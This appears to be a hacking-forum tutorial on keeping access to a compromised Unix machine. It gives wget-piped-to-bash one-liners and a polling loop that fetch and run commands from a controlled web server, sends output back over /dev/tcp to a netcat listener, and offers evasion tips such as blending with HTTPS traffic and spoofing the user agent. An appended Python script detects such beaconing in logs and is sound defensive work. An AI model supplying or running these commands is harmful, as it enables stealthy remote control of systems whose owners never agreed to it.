Using Wget for Maintaining Access to a System
#1
This is a little trick I picked up recently. Can't remember where I got it, but I'm going to show you how it works. Below is the bash command using wget. For those who don't know, wget is a file download utility preinstalled on most Unix-like systems.

Code:
wget -q -O - http://example.com | bash

So basically what's going on is wget downloads the file with no output (-q flag) and instead of writing to a file like normal it pipes the output of the command to bash. The command on the web page is then executed. http://example.com would be an HTTP server you control. You could host a simple text file with bash commands on it. For example, to make a "command page" for the shell all you have to do is (on Unix systems) enter: touch command.txt. Then put whatever command you want in the file. To list directory contents on the compromised system execute this command on your system: echo "ls" > command.txt

So that's all well and great. But it only allows one command to be executed at a time. Let's make a little bash script.

Code:
for i in {1..9999}
do
    wget -q -O - http://example.com | bash   # fetch the control page and run it
    sleep 60                                 # poll interval in seconds
done

Save as a bash script (something.sh) and then execute it on the target. It basically just executes whatever is on the control web page every 60 seconds. We can shorten this to a one-liner if you would rather not write the script to the target disk.

Code:
for i in {1..9999}; do wget -q -O - http://example.com | bash; sleep 60; done

You can't really see any of the output of your commands. The solution is to redirect output back to your machine. You'll need to have a netcat listener running to get the output:

Code:
wget -q -O - http://127.0.0.1:8080/cmd | bash &> /dev/tcp/127.0.0.1/31337

This is better than your average TCP reverse shell. The reasons being: 1) HTTP(S) is less suspicious on a network than straight-up TCP. And yes, if your site runs HTTPS then the shell communications will also be encrypted. 2) The connection only remains open as long as wget tries to connect back, which isn't long. The "sleep" time is obviously up to you, so it can connect back more or less often. So if you run netstat, you may or may not actually see it. If you do happen to catch it, it looks like an HTTP(S) connection. Under closer scrutiny on the network side, this shell will have a wget user agent. Just add your own with the wget -U flag.

That's all for today boys and girls. Hope you enjoyed and thanks for reading.

- ghost_eyes
https://github.com/ghostwalkr
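A defender-side check, added here and not part of the original post: over constructed web-server access-log lines it flags clients that poll one URL at a near-constant interval (the signature of a fixed sleep in a polling loop) with the stock Wget user agent, and a second helper flags recorded command lines of the wget-piped-to-bash form. The combined log format, the sample IPs and the jitter threshold are assumptions.

```python
import re
from datetime import datetime
from collections import defaultdict
from statistics import mean, pstdev

# Constructed sample (combined log format): 10.0.0.5 polls /cmd every ~60 s with a stock
# wget user agent; 10.0.0.7 is ordinary browser traffic. Not real server data.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:12:00:00 +0000] "GET /cmd HTTP/1.1" 200 12 "-" "Wget/1.21.3"
10.0.0.5 - - [10/Oct/2023:12:01:00 +0000] "GET /cmd HTTP/1.1" 200 12 "-" "Wget/1.21.3"
10.0.0.5 - - [10/Oct/2023:12:02:01 +0000] "GET /cmd HTTP/1.1" 200 12 "-" "Wget/1.21.3"
10.0.0.5 - - [10/Oct/2023:12:03:00 +0000] "GET /cmd HTTP/1.1" 200 12 "-" "Wget/1.21.3"
10.0.0.7 - - [10/Oct/2023:12:00:30 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Oct/2023:12:00:31 +0000] "GET /style.css HTTP/1.1" 200 800 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Oct/2023:12:07:45 +0000] "GET /about.html HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# Download-and-execute pipeline in a recorded command line (auditd execve, shell history):
# wget/curl ... | [sudo] sh/bash/zsh/dash. Word boundary keeps "| shasum" from matching.
PIPE_TO_SHELL_RE = re.compile(r'\b(wget|curl)\b[^|]*\|\s*(sudo\s+)?(ba|z|da)?sh\b')

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), m.group("path"), m.group("ua"), ts

def find_beacons(log_text, min_hits=3, max_jitter=5.0):
    """Return (ip, path, ua, mean_gap_s) for clients hitting one path at a steady period."""
    groups = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            groups[rec[:3]].append(rec[3])
    hits = []
    for (ip, path, ua), stamps in groups.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        if pstdev(gaps) <= max_jitter:   # near-constant interval => beacon-like polling
            hits.append((ip, path, ua, round(mean(gaps), 1)))
    return hits

def is_pipe_to_shell(cmdline):
    """True when a command line fetches a URL and pipes the body straight into a shell."""
    return PIPE_TO_SHELL_RE.search(cmdline) is not None
```

Browser traffic from 10.0.0.7 has irregular gaps and is not reported; the Wget client's 60-second cadence is.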